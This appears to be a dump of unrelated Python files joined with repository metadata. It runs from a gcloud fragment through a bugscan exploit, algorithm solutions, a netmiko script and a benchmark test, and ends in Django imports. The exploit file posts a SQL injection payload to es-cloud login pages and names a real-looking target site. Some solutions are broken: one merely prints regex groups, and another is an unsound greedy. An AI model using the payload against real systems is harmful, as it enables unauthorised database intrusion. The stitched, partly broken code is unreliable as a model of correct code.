scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
interconnect_attachment = client.InterconnectAttachment(
attachment_ref, compute_client=holder.client)
interconnect_ref = None
if args.interconnect is not None:
interconnect_ref = self.INTERCONNECT_ARG.ResolveAsResource(
args, holder.resources)
if args.router_region is None:
args.router_region = attachment_ref.region
if args.router_region != attachment_ref.region:
raise parser_errors.ArgumentException(
'router-region must be same as the attachment region.')
router_ref = None
if args.router is not None:
router_ref = self.ROUTER_ARG.ResolveAsResource(args, holder.resources)
return interconnect_attachment.Create(
description=args.description,
interconnect=interconnect_ref,
router=router_ref)
|
[
"me@gareth.codes"
] |
me@gareth.codes
|
c901c352d59c3fdf81e492c184b2a45cfa2bb28d
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_1284.py
|
1429903641e7e8e932e605922ac8a2efe0393840
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-0107850
def assign(service, arg):
if service == "es-cloud":
return True, arg
def audit(arg):
payloads = ['Easy/Login.aspx','Easy/Login2.aspx']
postdata = {
payloads[0] : '__VIEWSTATE=/wEPDwUKMTMyNjA3OTI4OGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2xvZ2luc3VibWl0&txtHostName=%27%20and%20db_name%281%29%3E1--&txtUserName=&txtUserPwd=&loginsubmit.x=41&loginsubmit.y=25',
payloads[1] :'__VIEWSTATE=/wEPDwULLTEzNDYxNTQ5ODZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQtsb2dpbnN1Ym1pdA==&txtHostName1=&txtUserName1=&txtUserPwd1=&txtHostName=%27%20and%20db_name%281%29%3E1--&txtUserName=&txtUserPwd=&loginsubmit.x=108&loginsubmit.y=26'
}
for payload in payloads:
url = arg + payload
code, head, res, errcode1, _ = curl.curl2(url,postdata[payload])
if code == 500 and 'master' in res :
security_hole(arg+payload)
if __name__ == '__main__':
from dummy import *
audit(assign('es-cloud','http://leaders56.com/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
9eb74cca9dec2cbb7c5746ec54fe8569c56b695c
|
fdafd2ef8a26a3e9ee6a4016ec6272516d64168f
|
/zeta_python/2504.py
|
72047ecde7f6205654a68ab7ecb7680a2175d6b7
|
[] |
no_license
|
yenru0/CodeObjecct
|
322d669d9e70b7202e5e527cda27da0b1e8f273d
|
b9d5260b973d7435c089c49bc8867be5d2be4d85
|
refs/heads/master
| 2021-06-28T06:13:57.978205
| 2021-03-13T00:47:53
| 2021-03-13T00:47:53
| 221,762,665
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,041
|
py
|
"""
2504: 괄호의 값
문제:
4개의 기호 ‘(’, ‘)’, ‘[’, ‘]’를 이용해서 만들어지는 괄호열 중에서 올바른 괄호열이란 다음과 같이 정의된다.
1. 한 쌍의 괄호로만 이루어진 ‘()’와 ‘[]’는 올바른 괄호열이다.
2. 만일 X가 올바른 괄호열이면 ‘(X)’이나 ‘[X]’도 모두 올바른 괄호열이 된다.
3. X와 Y 모두 올바른 괄호열이라면 이들을 결합한 XY도 올바른 괄호열이 된다.
예를 들어 ‘(()[[]])’나 ‘(())[][]’ 는 올바른 괄호열이지만 ‘([)]’ 나 ‘(()()[]’ 은 모두 올바른 괄호열이 아니다.
우리는 어떤 올바른 괄호열 X에 대하여 그 괄호열의 값(괄호값)을 아래와 같이 정의하고 값(X)로 표시한다.
1. ‘()’ 인 괄호열의 값은 2이다.
2. ‘[]’ 인 괄호열의 값은 3이다.
3. ‘(X)’ 의 괄호값은 2×값(X) 으로 계산된다.
4. ‘[X]’ 의 괄호값은 3×값(X) 으로 계산된다.
5. 올바른 괄호열 X와 Y가 결합된 XY의 괄호값은 값(XY)= 값(X)+값(Y) 로 계산된다.
예를 들어 ‘(()[[]])([])’ 의 괄호값을 구해보자. ‘()[[]]’ 의 괄호값이 2 + 3×3=11 이므로 ‘(()[[ ]])’의 괄호값은 2×11=22 이다.
그리고 ‘([])’의 값은 2×3=6 이므로 전체 괄호열의 값은 22 + 6 = 28 이다.
여러분이 풀어야 할 문제는 주어진 괄호열을 읽고 그 괄호값을 앞에서 정의한대로 계산하여 출력하는 것이다.
입력:
첫째 줄에 괄호열을 나타내는 문자열(스트링)이 주어진다. 단 그 길이는 1 이상, 30 이하이다.
출력:
첫째 줄에 그 괄호열의 값을 나타내는 정수를 출력한다. 만일 입력이 올바르지 못한 괄호열이면 반드시 0을 출력해야 한다.
"""
"""
TC1:
Input:
(()[[]])([])
Output:
28
"""
import re
Input = input()
par_regex = re.compile(r'\((.*?)\)')
t = par_regex.search(Input)
print(t.groups())
|
[
"yenru0604@gmail.com"
] |
yenru0604@gmail.com
|
8ddfbddd68a31c3d35868308a43e364033aab43e
|
26f6313772161851b3b28b32a4f8d255499b3974
|
/Python/PathCrossing.py
|
c22cf8f8b0dbf1ea31c2839c19c406d996aa76b8
|
[] |
no_license
|
here0009/LeetCode
|
693e634a3096d929e5c842c5c5b989fa388e0fcd
|
f96a2273c6831a8035e1adacfa452f73c599ae16
|
refs/heads/master
| 2023-06-30T19:07:23.645941
| 2021-07-31T03:38:51
| 2021-07-31T03:38:51
| 266,287,834
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
"""
Given a string path, where path[i] = 'N', 'S', 'E' or 'W', each representing moving one unit north, south, east, or west, respectively. You start at the origin (0, 0) on a 2D plane and walk on the path specified by path.
Return True if the path crosses itself at any point, that is, if at any time you are on a location you've previously visited. Return False otherwise.
Example 1:
Input: path = "NES"
Output: false
Explanation: Notice that the path doesn't cross any point more than once.
Example 2:
Input: path = "NESWW"
Output: true
Explanation: Notice that the path visits the origin twice.
Constraints:
1 <= path.length <= 10^4
path will only consist of characters in {'N', 'S', 'E', 'W}
"""
class Solution:
def isPathCrossing(self, path: str) -> bool:
direction_dict = {'N':(0,1), 'S':(0,-1), 'E':(1,0), 'W':(-1,0)}
visited = set()
pos = [0, 0]
visited.add(tuple(pos))
for d in path:
di,dj = direction_dict[d]
pos[0], pos[1] = pos[0] + di, pos[1] + dj
t_pos = tuple(pos)
if t_pos in visited:
return True
visited.add(t_pos)
return False
S = Solution()
path = "NES"
print(S.isPathCrossing(path))
path = "NESWW"
print(S.isPathCrossing(path))
|
[
"here0009@163.com"
] |
here0009@163.com
|
58311bff281c8ef4d985364018cccc1599e69c6b
|
fb2325de1317bed91edb428b5a5a3dad518fa8f2
|
/python-scripts/tqdm_examples/3_tqdm_two_progress_bars.py
|
3bb9c5f6faea3fd6c5990f581c06c8b6ea2aa9d5
|
[] |
no_license
|
gridl/python-ansible-experiments
|
3b22d32db97bc55fd728ad513eb4176c3aae3482
|
d7595804aa9c58f2efc92a5bf8d57faccc61cac6
|
refs/heads/master
| 2020-07-02T07:00:52.876940
| 2019-08-01T16:00:25
| 2019-08-01T16:00:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,375
|
py
|
from concurrent.futures import ThreadPoolExecutor, as_completed
from pprint import pprint
import yaml
import tqdm
from netmiko import ConnectHandler
def conn_ssh_threads(function, devices, command, limit=3, progress_bar=True):
result_dict = {}
with ThreadPoolExecutor(max_workers=limit) as executor:
future_ssh = [executor.submit(function, device, command)
for device in devices]
done_tasks = as_completed(future_ssh)
if progress_bar:
success_bar = tqdm.tqdm(total=len(devices), desc='Correct'.rjust(10))
done_tasks = tqdm.tqdm(done_tasks, total=len(devices), desc='All'.rjust(10))
for task in done_tasks:
task_ok, result = task.result()
if task_ok:
success_bar.update(1)
result_dict.update(result)
success_bar.close()
return result_dict
def send_show_command(device, show_command):
result = {}
with ConnectHandler(**device) as ssh:
ssh.enable()
result[device['ip']] = ssh.send_command(show_command)
if device['ip'] == '192.168.100.1':
return False, result
else:
return True, result
if __name__ == '__main__':
with open('devices.yaml') as f:
devices = yaml.load(f)
results = conn_ssh_threads(send_show_command, devices, 'sh ip int br')
print()
|
[
"nataliya.samoylenko@gmail.com"
] |
nataliya.samoylenko@gmail.com
|
5ef6d164bee4bc70549b4ddbf316067cfc70872f
|
5de328dace679cd32b2d32725832b8f75b2dbc11
|
/utils/plot_modularity_statistics.py
|
8b58be30e8bd1bf7c81b7b2e4952dfcb15b37afc
|
[] |
no_license
|
hag007/emp_evaluation
|
94230b4bdb296d27237fa3de4d0b9e83ea3ee897
|
52ac70f4593a97bd4a62174d5e58cc5c84ee2820
|
refs/heads/master
| 2021-06-13T21:28:41.609495
| 2020-09-10T09:27:23
| 2020-09-10T09:27:23
| 254,448,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
import sys
sys.path.insert(0, "../")
import numpy as np
import matplotlib.pyplot as plt
import os
import constants
with open(os.path.join(constants.OUTPUT_GLOBAL_DIR, "modularity_statistics.txt")) as f:
n_modules = [int(a) for a in f.readline().strip()[1:-1].split(', ')]
n_large_modules = [int(a) for a in f.readline().strip()[1:-1].split(', ')]
modularity_scores = [float(a) for a in f.readline().strip()[1:-1].split(', ')]
prev=0
for i, cur_score in enumerate(modularity_scores):
if cur_score<prev:
stop=i
plt.subplots(figsize=(20,17))
plt.cla()
plt.plot(np.arange(len(n_modules)), n_modules, label="n_modules")
plt.plot(np.arange(len(n_large_modules)), n_large_modules, label="n_large_modules")
plt.plot(np.arange(len(modularity_scores)), [a for a in modularity_scores], label="modularity_scores")
for i, a in enumerate(modularity_scores):
plt.annotate("{}/{}".format(n_large_modules[i], n_modules[i]), (i,a))
plt.xlabel("iteration")
plt.ylabel("modularity score")
plt.title("Newman-Girvan modularity curve\nin DIP network")
plt.legend()
plt.savefig(os.path.join(constants.OUTPUT_GLOBAL_DIR, "modularity_statistics.png"))
|
[
"hagai.levi.007@gmail.com"
] |
hagai.levi.007@gmail.com
|
97ebd726684ddf767f28ab2bfd0e5e12f98afaa4
|
037e55864b1d7db7db05f23261d3a008df8878b1
|
/rebench/tests/features/issue_32_jmh_support_test.py
|
58768f9e7e5427d58e4492f1a06e24f30b9bb8e7
|
[
"MIT"
] |
permissive
|
mmtk/ReBench
|
3d5f95edd8b3ef592db6c8b20d4a6bb404e615ed
|
709e6f0a1be6fd7bf4b4d13d057f040254a3991b
|
refs/heads/master
| 2022-12-18T23:58:11.944800
| 2020-08-11T12:39:31
| 2020-08-11T12:39:31
| 292,157,028
| 0
| 0
|
MIT
| 2020-09-02T02:21:17
| 2020-09-02T02:21:16
| null |
UTF-8
|
Python
| false
| false
| 2,018
|
py
|
# Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from os.path import dirname, realpath
from unittest import TestCase
from ...interop.jmh_adapter import JMHAdapter
class Issue32JMHSupport(TestCase):
"""
Add support for JMH, a Java benchmarking harness.
"""
def setUp(self):
self._path = dirname(realpath(__file__))
with open(self._path + "/issue_32_jmh.data") as data_file:
self._data = data_file.read()
def test_parsing(self):
adapter = JMHAdapter(False)
data_points = adapter.parse_data(self._data, None, 1)
self.assertEqual(4 * 20, len(data_points))
for i in range(0, 60):
self.assertAlmostEqual(830000, data_points[i].get_total_value(),
delta=60000)
for i in range(60, 80):
self.assertAlmostEqual(86510, data_points[i].get_total_value(),
delta=4000)
|
[
"git@stefan-marr.de"
] |
git@stefan-marr.de
|
5781fff7ad852f1351497e6d1a8ff523c8de95b7
|
018a1d8d59c00f69b0489ce05567a2972c335ff7
|
/2017_May23/generators/for_implementation.py
|
713eb216a4145dbfd4067b77ea9dded1f02454a9
|
[] |
no_license
|
singhujjwal/python
|
f0127b604e2204a02836c95d89ee4903f760d48c
|
4fb4b34a318f093bd944cd70d7f0d69dd7dfef6e
|
refs/heads/master
| 2021-09-20T15:35:13.389400
| 2021-09-03T06:39:58
| 2021-09-03T06:39:58
| 92,157,309
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
a = [10, 20, 30, 40, 50]
#for i in a:
# print i,
length = len(a)
iterator = iter(a)
while length:
i = iterator.next()
# Body of for loop
print i,
length -= 1
# -----------------------------
iterator = iter(a)
try:
while True:
i = iterator.next()
# Body of 'for' loop
print i,
except StopIteration: pass
|
[
"ujjsingh@cisco.com"
] |
ujjsingh@cisco.com
|
a21976098d397a872b65179026a16e0c985a6ddf
|
eb2668b93899637f04e4c93e01063d0c8175ccde
|
/Stock_prices/Polimetall/Polimetall_stock_price_LSTM.py
|
dba94543d4d0d4a5cb22d9943bd63d902f40b0a3
|
[] |
no_license
|
D-Katt/AI-Machine-Learning
|
aad1fe1c8f3f901cb7829919d1b69a106f0ddfab
|
1868c92366dccabf8c86c559eee640645b51bb51
|
refs/heads/master
| 2021-12-19T21:59:04.403188
| 2021-12-07T13:07:46
| 2021-12-07T13:07:46
| 235,104,866
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,253
|
py
|
"""Model predicts next day's stock price for Polymetall metal company
based on the close price for previous periods. Univariate LSTM model.
Data source: https://www.finam.ru/profile/moex-akcii/polymetal-international-plc/export/
"""
import pandas as pd
import numpy as np
import datetime
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
# Plots display settings
plt.rcParams['figure.figsize'] = 12, 8
plt.rcParams.update({'font.size': 14})
FILE_PATH = 'POLY_stock_price.csv'
# Tensorflow settings
EPOCHS = 1000
PATIENCE = 5
BATCH_SIZE = 64
LOOKBACK = 3
SAMPLING_RATE = 1
STRIDE = 1
# --------------------------- Functions -----------------------------
def get_data(path: str) -> pd.DataFrame:
    """Load close prices for the stock from a local csv file.

    Also renders the loaded series via display_data() as a side effect.

    :param path: Path to a csv file
    :return: DataFrame with close price column and datetime index
    """
    def _parse_date(raw: str) -> datetime.datetime:
        # Dates in the finam.ru export are packed as YYYYMMDD.
        return datetime.datetime.strptime(raw, '%Y%m%d')

    prices = pd.read_csv(
        path,
        usecols=['<CLOSE>', '<DATE>'],
        index_col='<DATE>',
        date_parser=_parse_date,
    )
    display_data(prices)
    return prices
def display_data(df: pd.DataFrame):
    """Function displays a chart with historical prices.

    The chart is both saved to 'prices.png' and shown interactively.

    :param df: 1-column DataFrame with prices and datetime index
    """
    plt.plot(df)
    plt.title('Stock Price')
    plt.ylabel('Rubles')
    plt.savefig('prices.png')  # save before show(): show() clears the figure
    plt.show()
def plot_history(hist):
    """Function plots a chart with training and validation metrics.

    Saves the chart to 'uni_training.png' and shows it interactively.

    :param hist: Tensorflow history object from model.fit()
    """
    # Losses
    # NOTE(review): despite the names, 'mae'/'val_mae' hold the MSE loss
    # values ('loss' is compiled as mse below).
    mae = hist.history['loss']
    val_mae = hist.history['val_loss']
    # Epochs to plot along x axis
    x_axis = range(1, len(mae) + 1)
    plt.plot(x_axis, mae, 'bo', label='Training')
    plt.plot(x_axis, val_mae, 'ro', label='Validation')
    plt.title('Mean Squared Error')
    plt.ylabel('Loss (MSE)')
    plt.xlabel('Epochs')
    plt.legend()
    plt.tight_layout()
    plt.savefig('uni_training.png')
    plt.show()
# ------------------------ Data processing --------------------------
# Historical data
data = get_data(FILE_PATH)
# Scale numeric data to the range between 0 and 1.  The fitted scaler is
# reused later to invert forecasts back to rubles.
scaler = MinMaxScaler()
data_scaled = scaler.fit_transform(np.array(data).reshape(-1, 1))
# Create iterables containing stock prices and corresponding next day's
# prices: targets are the same series shifted one step forward.
input_features = data_scaled[:-1, :]
targets = data_scaled[1:, :]
# Leave latest periods for test and validation purposes.
# Chronological split: train | last 120..50 days = validation | last 50 = test.
train_data = input_features[:-120]
val_data = input_features[-120:-50]
test_data = input_features[-50:]
train_targets = targets[:-120]
val_targets = targets[-120:-50]
test_targets = targets[-50:]
print(f'Dataset shape: {data.shape}')
print(f'Train data: {train_data.shape}')
print(f'Validation data: {val_data.shape}')
print(f'Test data: {test_data.shape}')
# Create tensorflow dataset objects.  TimeseriesGenerator windows
# LOOKBACK consecutive prices into each sample; only the training set is
# shuffled so validation/test stay in chronological order.
train_ds = tf.keras.preprocessing.sequence.TimeseriesGenerator(
    train_data, train_targets,
    length=LOOKBACK, sampling_rate=SAMPLING_RATE,
    stride=STRIDE, shuffle=True,
    batch_size=BATCH_SIZE
)
val_ds = tf.keras.preprocessing.sequence.TimeseriesGenerator(
    val_data, val_targets,
    length=LOOKBACK, sampling_rate=SAMPLING_RATE,
    stride=STRIDE, shuffle=False,
    batch_size=BATCH_SIZE
)
test_ds = tf.keras.preprocessing.sequence.TimeseriesGenerator(
    test_data, test_targets,
    length=LOOKBACK, sampling_rate=SAMPLING_RATE,
    stride=STRIDE, shuffle=False,
    batch_size=BATCH_SIZE
)
# -------------------------------- Model -----------------------------------
# Neural network with Long Short-Term Memory layers.
# Two stacked 4-unit LSTMs (the first returns sequences so the second can
# consume them) followed by a single-value regression head.
model = tf.keras.models.Sequential(
    [
        tf.keras.layers.LSTM(4, recurrent_dropout=0.15, return_sequences=True,
                             input_shape=(LOOKBACK, 1)),
        tf.keras.layers.LSTM(4, recurrent_dropout=0.15, return_sequences=False),
        tf.keras.layers.Dense(1)
    ]
)
# MSE loss for training; MAPE reported as a human-readable secondary metric.
model.compile(optimizer='adam', loss='mse',
              metrics=[tf.keras.metrics.MeanAbsolutePercentageError()])
model.summary()
# Train the model until validation accuracy stops improving;
# restore_best_weights rolls back to the best validation epoch.
early_stop = tf.keras.callbacks.EarlyStopping(
    monitor='val_loss', patience=PATIENCE, restore_best_weights=True
)
history = model.fit(train_ds,
                    epochs=EPOCHS,
                    verbose=2,
                    validation_data=val_ds,
                    callbacks=[early_stop])
plot_history(history)
# Evaluate the model on the test set
test_loss, test_mape = model.evaluate(test_ds)
print(f'MSE loss on test data: {test_loss}\nMAPE: {test_mape}')
# Forecasts for validation and test periods, inverted back to rubles.
pred_val = model.predict(val_ds)
pred_val = scaler.inverse_transform(pred_val)
pred_test = model.predict(test_ds)
pred_test = scaler.inverse_transform(pred_test)
# Visualize forecast vs. actual prices.  The first LOOKBACK days of each
# split have no prediction, hence the index offsets below.
plt.plot(data[-150:], label='Actual data')
plt.plot(data[-120+LOOKBACK-1:-50-1].index, pred_val.ravel(), label='Validation forecast')
plt.plot(data[-50+LOOKBACK-1:-1].index, pred_test.ravel(), label='Test forecast')
plt.ylabel('Rubles')
plt.title('Stock Price')
plt.legend()
plt.savefig('uni_forecast.png')
plt.show()
|
[
"noreply@github.com"
] |
D-Katt.noreply@github.com
|
f1428f69f24ccc83805630ac7b8aa0c3d0a03709
|
1285703d35b5a37734e40121cd660e9c1a73b076
|
/codility/lesson_dp.py
|
75630e274ca92cb387134bb84a03666605defdcd
|
[] |
no_license
|
takin6/algorithm-practice
|
21826c711f57131108168775f08e4e13d07a3b38
|
f4098bea2085a77d11c29e1593b3cc3f579c24aa
|
refs/heads/master
| 2022-11-30T09:40:58.083766
| 2020-08-07T22:07:46
| 2020-08-07T22:07:46
| 283,609,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,728
|
py
|
# Problem (Codility MinAbsSum): choose signs S[i] in {-1, 1} minimising
# val(A, S) = abs(sum(A[i] * S[i] for i in range(N))).
# Example: A = [1,5,2,-2] with S = [-1,1,-1,1] gives val = 0.
# (Assume that the sum of zero elements equals zero.)
def solution(A):
    # NOTE(review): dead code — this definition is immediately shadowed by
    # the second `solution` below.  The approach is also unsound: taking
    # abs() at every step discards the sign of the running sum, so the
    # per-element min is a greedy choice that need not reach the optimum.
    A = [ abs(i) for i in A ]
    N = len(A)
    # dp[0][j] / dp[1][j]: best value after j elements when element j was
    # taken with sign -1 / +1 respectively.
    dp = [ [float("inf")]*(N+1) for _ in range(2)]
    dp[0][0], dp[1][0] = 0, 0
    for i in range(1, N+1):
        dp[0][i] = min( abs( (A[i-1] * -1) + dp[0][i-1] ), abs( (A[i-1] * -1) + dp[1][i-1] ) )
        dp[1][i] = min( abs( A[i-1] + dp[0][i-1] ), abs( A[i-1] + dp[1][i-1] ) )
    # Earlier variant that kept the signed sums instead of their abs():
    # for i in range(1, N+1):
    #     if abs((A[i-1] * -1) + dp[0][i-1]) > abs((A[i-1] * -1) + dp[1][i-1]):
    #         dp[0][i] = (A[i-1] * -1) + dp[1][i-1]
    #     else:
    #         dp[0][i] = (A[i-1] * -1) + dp[0][i-1]
    #     if abs(A[i-1] + dp[0][i-1]) > abs(A[i-1] + dp[1][i-1] ):
    #         dp[1][i] = A[i-1] + dp[1][i-1]
    #     else:
    #         dp[1][i] = A[i-1] + dp[0][i-1]
    print(dp)  # debug output left in by the author
    return min(abs(dp[0][-1]), abs(dp[1][-1]))
def solution(A):
    """Codility MinAbsSum: choose signs S[i] in {-1, 1} minimising
    |sum(A[i] * S[i])|.

    Counting DP over absolute values: dp[j] >= 0 means some subset of the
    values processed so far sums to j, and its value is how many copies of
    the current magnitude `a` remain usable after reaching j.  Any subset
    summing to j yields a total of |S - 2*j|, so the answer is the
    reachable j closest to S/2.  Runs in O(N * max|A|) time.

    Note: shadows the (dead, greedy) `solution` defined above; mutates A
    in place to absolute values, as the original did.

    :param A: list of ints (may be empty; the empty sum is 0)
    :return: minimal achievable |sum|
    """
    N = len(A)
    M = 0
    for i in range(N):
        A[i] = abs(A[i])
        M = max(A[i], M)
    S = sum(A)
    # count[a] = number of elements with absolute value a.
    count = [0] * (M + 1)
    for i in range(N):
        count[A[i]] += 1
    dp = [-1] * (S + 1)
    dp[0] = 0
    for a in range(1, M + 1):
        if count[a] > 0:
            # Fix: iterate up to and including S (was range(S)).
            for j in range(S + 1):
                if dp[j] >= 0:
                    dp[j] = count[a]
                elif j >= a and dp[j - a] > 0:
                    # Fix: reachability of j depends on cell j-a, not j-1.
                    dp[j] = dp[j - a] - 1
    result = S
    for i in range(S // 2 + 1):
        if dp[i] >= 0:
            result = min(result, S - 2 * i)
    return result
# Quick manual checks (expected MinAbsSum results: 0 and 1).
print(solution([1,5,2,-2]))
print(solution([1,5,2,-3]))
|
[
"takayukiinoue116@gmail.com"
] |
takayukiinoue116@gmail.com
|
dff75fc51048521dd1ee7a43e1493fde50e29379
|
58937468e368e87ff8683ba481e1d42a0fd56422
|
/government/serializers/__init__.py
|
605fa9d9ae7cc6b55415319886e1c4c33ef25446
|
[
"MIT"
] |
permissive
|
The-Politico/politico-civic-government
|
8da45c490eda094bb136a8e3d3b954daebcef617
|
623baf95e1b029c3bbfccf300cdfca630f4969f8
|
refs/heads/master
| 2022-12-11T12:37:46.837216
| 2019-01-04T19:33:19
| 2019-01-04T19:33:19
| 116,028,686
| 0
| 0
|
MIT
| 2022-10-18T18:31:26
| 2018-01-02T15:21:27
|
Python
|
UTF-8
|
Python
| false
| false
| 169
|
py
|
# flake8: noqa
from .body import BodySerializer
from .office import OfficeSerializer
from .jurisdiction import JurisdictionSerializer
from .party import PartySerializer
|
[
"jmcclure@politico.com"
] |
jmcclure@politico.com
|
b86910e27df29df8ecc51ae23afdae872eb46631
|
4ca008a67bc91383255d2a1919b46556ef50622e
|
/support/main/migrations/0004_auto_20190306_1409.py
|
224c992f35c9222f20476e4d70b9f373a840169f
|
[] |
no_license
|
zdimon/support-ionic-django
|
8dc649fc13f3d67f0982ed8b5a796f4e443a60fc
|
f6c096cfa99bb1f6cdb2bf94af2865b02f8e7c75
|
refs/heads/master
| 2023-02-08T04:23:28.990129
| 2021-10-07T05:56:43
| 2021-10-07T05:56:43
| 244,316,789
| 0
| 0
| null | 2023-01-24T01:31:40
| 2020-03-02T08:21:35
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 539
|
py
|
# Generated by Django 2.1.7 on 2019-03-06 14:09
from django.db import migrations
import tinymce.models
class Migration(migrations.Migration):
    # Replaces digest.value with a rich-text digest.content column.
    # Auto-generated by Django (2.1.7); avoid hand-editing applied migrations.

    dependencies = [
        ('main', '0003_auto_20190306_1403'),
    ]

    operations = [
        # Drop the old plain 'value' column...
        migrations.RemoveField(
            model_name='digest',
            name='value',
        ),
        # ...and add an HTML 'content' column in its place.  default=''
        # backfills existing rows; preserve_default=False keeps the model
        # field itself without a permanent default afterwards.
        migrations.AddField(
            model_name='digest',
            name='content',
            field=tinymce.models.HTMLField(default=''),
            preserve_default=False,
        ),
    ]
|
[
"zdimon@example.com"
] |
zdimon@example.com
|
f33f82dad957ad77c9c30ba73d16dbacfdfd33f1
|
dc8a337ea1d8a285577d33e5cfd4dbbe846ee1a0
|
/src/main/scala/MaximumAverageSubtree.py
|
a398eb6c8e7364ea2a69c3d5df160e65f8b0b9f4
|
[] |
no_license
|
joestalker1/leetcode
|
8a5cdda17abd33c3eef859732f75d7bec77a9d0e
|
ae392ddbc7eb56cb814b9e9715043c98a89a6314
|
refs/heads/master
| 2023-04-13T22:09:54.407864
| 2023-04-09T19:22:54
| 2023-04-09T19:22:54
| 131,803,943
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 752
|
py
|
class TreeNode:
    """Binary-tree node: a value plus optional left/right children."""
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
class Solution:
    """LeetCode 1120: maximum average value over all subtrees."""

    def maximumAverageSubtree(self, root):
        """Return the largest (subtree sum / subtree size) in the tree.

        Single post-order walk: each call reports (size, total, best
        average so far) for its subtree, so every node is visited once.
        Returns 0 for an empty tree.
        """
        if not root:
            return 0

        def walk(node):
            # (node count, value sum, best average seen) for this subtree.
            if node is None:
                return 0, 0, 0
            l_size, l_total, l_best = walk(node.left)
            r_size, r_total, r_best = walk(node.right)
            size = l_size + r_size + 1
            total = l_total + r_total + node.val
            best = max(total / size, l_best, r_best)
            return size, total, best

        return walk(root)[2]
|
[
"stalker.comp@gmail.com"
] |
stalker.comp@gmail.com
|
acb7e479c8659db7cf8998b68023fe7856a6a3eb
|
4c3e992678341ccaa1d4d14e97dac2e0682026d1
|
/addons/website_crm/__manifest__.py
|
25c3c8c27c1aaa7be1c4bea195297a66d7694d84
|
[] |
no_license
|
gahan-corporation/wyatt
|
3a6add8f8f815bd26643e1e7c81aea024945130d
|
77e56da362bec56f13bf0abc9f8cf13e98461111
|
refs/heads/master
| 2021-09-03T18:56:15.726392
| 2018-01-08T02:54:47
| 2018-01-08T02:54:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
# Odoo addon manifest: turns website contact-form submissions into CRM leads.
{
    'name': 'Contact Form',
    'category': 'Website',
    'sequence': 54,  # ordering weight among website apps
    'website': 'https://www.gerp.com/page/website-builder',
    'summary': 'Create Leads From Contact Form',
    'version': '2.0',
    'description': "",
    # Needs the generic form builder, partner pages and the CRM app.
    'depends': ['website_form', 'website_partner', 'crm'],
    'data': [
        'data/website_crm_data.xml',
        'views/website_crm_templates.xml',
        'views/res_config_settings_views.xml',
    ],
    'qweb': ['static/src/xml/*.xml'],
    'installable': True,
    # auto_install: activated automatically once all dependencies are installed.
    'auto_install': True,
}
|
[
"duchess@gahan-corporation.com"
] |
duchess@gahan-corporation.com
|
f71fa3008085e80be37a7aacd30689da78448a15
|
60e26e2c6e1fe185f0af2065cb4fd4d6d506504e
|
/engine/multimedia/api_view.py
|
3ab0699cd607fc493fb62d36e931b581326efe44
|
[
"BSD-3-Clause"
] |
permissive
|
NamoxLabs/BlogEngine
|
4887df1078e4b15bc44c51b9b8c2d8b1e8a6aca4
|
741549e78b58bbc857e9dcecd88034de49d73304
|
refs/heads/master
| 2023-05-12T08:38:36.811094
| 2020-12-10T01:36:59
| 2020-12-10T01:36:59
| 155,762,174
| 1
| 2
|
BSD-3-Clause
| 2023-04-29T18:53:41
| 2018-11-01T19:00:48
|
Python
|
UTF-8
|
Python
| false
| false
| 3,159
|
py
|
from rest_framework import generics, permissions, renderers, viewsets, authentication
from rest_framework.views import APIView
from rest_framework.parsers import MultiPartParser, FormParser
from rest_framework.decorators import api_view, action
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework_jwt.settings import api_settings
from engine.multimedia.models import MultimediaUser as MulUserModel, MultimediaCategory as MulCatModel,\
MultimediaSubategory as MulSubCModel, MultimediaPost as MulPostModel
from .serializers import MulUserSerializer, MulCatSerializer,\
MulSubCSerializer, MulPostSerializer
